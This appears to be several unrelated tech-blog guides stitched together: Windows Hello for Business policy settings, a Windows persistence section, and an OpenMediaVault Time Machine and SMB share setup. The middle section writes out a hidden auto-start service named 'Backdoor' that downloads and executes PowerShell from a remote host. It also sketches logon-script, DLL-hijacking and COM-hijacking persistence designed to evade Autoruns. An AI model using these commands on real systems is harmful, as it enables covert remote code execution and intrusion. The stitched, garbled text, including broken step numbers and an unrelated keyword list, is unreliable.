If you are not sure which kind of Windows 10 you are using, jump to Section 2
1 For Domain Joined / Intune Managed Windows 10
If configuring with domain joined/Intune managed Windows 10, sometimes we want to give the user option to use the Windows Hello or not. Then follow this guide first “Windows 10 Sign-in options and Windows Hello Set up button greyed out After Joined AAD (Azure Active Directory)” After we have done with the above guide (The above guide modify the Windows Hello for Business organisation wide for future enrol Windows 10), next time we have new Windows 10 enrolled to the AAD, the system will request us to setup PIN/Windows Hello or Windows Hello for Business on enrolment but sometimes we don’t want to setup Windows Hello / Windows Hello for Business for some devices. We can follow Section 2 to enable and disable Windows Hello for Business individually.
2 For domain joined/ Intune Managed, non-domain joined/non-Intune managed and all other average users of Windows 10
2.1 Enable and Disable Windows Hello for Business via Group Policy
2.1.1 Use Win + R to lunch “RUN” window
2.1.2 Type gpedit.msc then hit Enter key to open Local Group Policy Editor
2.1.3 Navigate to “Computer Configuration” -> “Administrative Templates” -> “Windows Components” -> “Windows Hello for Business”
2.1.4 Double click on “Use Windows Hello for Business”
2.1.5 From the pop-up window, we can Enable or Disable Windows Hello for Business, also Enable or Disable “Do not start Windows Hello provisioning after sign-in”
To Enable Windows 10 to ask users to setup Windows Hello for Business right after login, we can leave the “Do not start Windows Hello provisioning after sign-in” option unchecked. (Useful for pre-configuration, then deliver to the end user, a form of forcing the end user to setup the Windows Hello for Business, If you have Multi-factor authentication (MFA) configured, it might ask them to configure MFA first before configuring Windows Hello for Business.)
To disable Windows 10 to ask users to setup Windows Hello for Business right after login, we need check the “Do not start Windows Hello provisioning after sign-in” option.
2.2 Enable and Disable Windows Hello for Business via Registry
2.2.1 Follow Step 2.1.1 to 2.1.2, Instead typing “gpedit.msc” we replace it with “regedit”
2.2.2 Navigate to “Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PassportForWork”
126.96.36.199 (If “PassportForWork” Key does not exist, create it manually) Right click on “Microsoft” -> Select “New” -> “Key” -> Name it “PassportForWork”
2.2.3 We need to create two Values “Enabled” and “DisablePostLogonProvisioning” Right click on right panel, Select “New” -> “DWORD (32-bit) Value”
Note: When execute in command prompt, single quote will be replace to double quot, here we use three double quotes.
This script will launch every 1 minute
sc create "Backdoor" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.5:8080/fun.png'))\""
sc description Backdoor "Backdoor Test" //Description for the service
sc config Backdoor start= auto //Make it auto-start
net start Backdoor //Start the service
We can utilize “powersploit” module from “powersploit”
Run -> gpedit.msc -> User Configuration -> Scripts (Logon/Logoff)
Note: Must use full path e.g. “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe”
If an process is trying to load a dll without absolute path, Windows will try to look for the dll from specified folder. If one of the folders can by modified by the attacker, the malicious dll will be loaded, then the malicious code will be executed.
Common attack like LPK.dll
Windows 7 and up have added KnownDLLs protection, add LPK.dll to following registry key to enable the dll hijacking
The key is to create correct dll and choose right CLSID, by changing CLSID key value from registry, CAccPropServicesClass hacking and MMDeviceEnumerator hijacking can be carried out. Many system processes will invoke them when starting. It can bypass auto-start checks from Autoruns.
Remote Control, Remote Access Trojan (RAT)
RAT is a type of malicious program it includs backdoors on victims’ devices. Usually propagate by normal client requests, e.g. email attachments, game program. etc. Attacker use them on clients’ device to spread RAT, eventually build botnet.
To keep the system safe and away from backdoors, we have to have knowledge in troubleshooting intrusion, keep the system up to date, check server security regularly.
In How To: Create Apple Time Machine in Open Media Vault (OMV) we have walked-through how to create Apple Time Machine in OMV 4 with openmediavault-netatalk plugin. It’s compatible with many older and newer macOS, but it’s not possible to see or share files using that space with Microsoft Windows Operating Systems like Windows 10 etc.
From macOS Mojave 10.14 and onwards (Including macOS Catalina 10.15), Time Machine is compatible with Windows Share/Shared Folder/SMB/CIFS. (Suggested minimum SMB version V3)
This guide will not only walk you through how to create apple time machine in open media vault 5 (OMV 5) with Shared Folder/SMB Share/Windows Share/CIFS, you will also learn how to create Windows shared folder for use between Windows PC<-> Windows PC, Windows PC <-> macOS, macOS <-> macOS in OMV 5.
2.1 Make sure you have attached the physical disk to the device
2.2 Login to open media vault webui
2.3 Go to “Storage” -> “Disks”
2.4 Scan for disks if it’s not there
2.5 Go to “Storage” -> “File Systems”
2.6 Click on “Create” button to create and initialise the disk for use
2.7 Create file system, make sure you have selected correct “Device”, you can leave the “Label” empty, select default “EXT4” as “File system” if you have no idea what is this or which one to go with.
2.8 Now the new File system is created, we need to Mount it (Attach it for use). Select the File system we have just created, then click on Mount button
2.9 Click on “Apply” to commit the change
3 Create Windows Share (SMB Share/Shared Folder/CIFS) For Time Machine (and Windows) to use/share
3.1 Go to “Services” -> “SMB/CIFS”
3.2 Click on “Shares” then click on “Add”
3.3 Click on “+” button from “Shared folder” row
3.4 Give it a name, select correct device, create a path leave the permission as default, Click on “Save” button to save the settings
3.5 Make sure “Shared folder” row has right settings, Make sure “Time Machine support” is enabled, Click on “Save” button to save the settings
3.6 Click on Settings, enable SMB/CIFS service
3.7 Now you will be able to find the Time Machine folder from your “macOS” -> Top Left corner “Apple Icon” -> “System Preferences” -> “Time Machine” -> “Select Backup Disk…” (Warning: It’s a good idea to continue with Section 4 to create and use a dedicate account for accessing shared folder rather than using OMV’s administrator account for security reasons though it’s not essential for making shared folder and Time Machine working)
4 Create and configure Users if necessary
4.1 Go to “Access Rights Management” -> “User”
4.2 Click on “Add” -> “Add”
4.3 Enter Name, Password for the new user under “General” tab, make sure the user is in “users” group under “Group” tab
4.3 Now you should be able to see the new user in the list
5 Configure user permission for shared folder
5.1 Go to “Access Rights Management” -> “Shared Folders”
5.2 Click on the shared folder which we have configured in Section 3, then click on “Privileges” button, make sure give “Read/Write” access to the user we have created
6 Configure Time Machine on macOS
6.1 On macOS, go to Top Left corner “Apple Icon” -> “System Preferences” -> “Time Machine” -> “Select Backup Disk…”
6.2 Select the one we have just created under “Available Disks”, click on “Use Disk” button, it will start to backup automatically. If you want secure the backup, make sure check the “Encrypt backups” before click on “Use Disk”
6.3 If you do not like automatic backup, just uncheck “Back Up Automatically” (Check “Show Time Machine in menu bar”, it will make your manual backup easier, the time machine icon will appear at the top of the screen (Menu bar) and access able for you to manually backup)
Extra: 7 Configure disk quota (Limit Time Machine size in shared folder)
7.1 In OMV, go to “Storage” -> “File Systems”, click on the Filesystem which we have just created, click on “Quota”, set an appropriate size limit for the user we have just created for Time Machine purpose and click on “Save” button
Note: This will not only limit Time Machine backup size, it actually limits the usable size for the user/account on this filesystem which means, including time machine and windows share as well. If you only want to limit time machine size, use that account only for time machine purpose, then create another account for windows share or other purpose of file sharing.
Extra: 8 Microsoft Windows access the shared folder
8.1 Open File Explorer/This PC from Windows and enter the IP address of OMV or host name of it e.g. o-test.mynetwork then Press Enter key
8.2 Enter your credential details then click on “OK” button
8.3 Now you will see the shared folder which we have created
8.4 Double click to open the shared folder, If you have already initialized Time Machine backup, you will be able to see a folder named “YourMacName.backupbundle”
(You won’t be able to see normal file structures e.g. your photo or document on your macOS’ desktop (Since it’s just for demo purpose I did not opt-in for encrypt backup option and that’s what you will see if the time machine backup is not encrypted ))
8.5 You can also create and modify folders and files in the shared folder from Windows PC
(Note: I strongly suggest to use this shared folder only for time machine, to protect the backup files from mistakes like accidental deletion/rename etc. You can follow Section 3 and Section 4 again to create an dedicate shared folder for macOS and Windows PC to share files rather than for Time Machine to backup files and the system, the only difference will be leave the “Time Machine support” option disabled at Step 3.5)
Keywords: Microsoft, Microsoft Windows, Microsoft Office 365, Microsoft Windows PowerShell, Microsoft Office 365 Exchange, Multi-factor authentication, MFA, ecp, connect to Microsoft Office 365 Exchange via PowerShell with MFA enabled